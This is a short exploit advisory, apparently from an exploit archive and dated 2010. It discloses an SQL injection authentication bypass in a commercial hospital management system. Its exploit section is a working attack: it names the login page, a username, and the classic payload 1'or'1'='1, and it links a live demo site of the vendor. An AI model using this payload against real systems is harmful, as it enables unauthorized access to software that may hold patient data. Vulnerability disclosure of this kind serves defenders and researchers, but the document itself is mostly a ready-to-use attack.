Pre Hospital Management System suffers from a remote SQL injection vulnerability that allow for authentication bypass.
a5fc964240547fd0a9fe8dce3ca5a5bf3f902e10e8601e63c4158e63511211ff
In The Name Of GOD
[+] Exploit Title: PRE HOSTPITAL MANAGEMENT SYSTEM SQL Bypass Vulnerability
[+] Date: 2010-11-13
[+] Author : Cru3l.b0y
[+] Software Link: http://www.preproject.com/hms.asp
[+] Price : 750.00$
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :
go to /login.php
Username : Administration
Password : 1'or'1'='1
[+] Demo: http://hms.preproject.com/login.php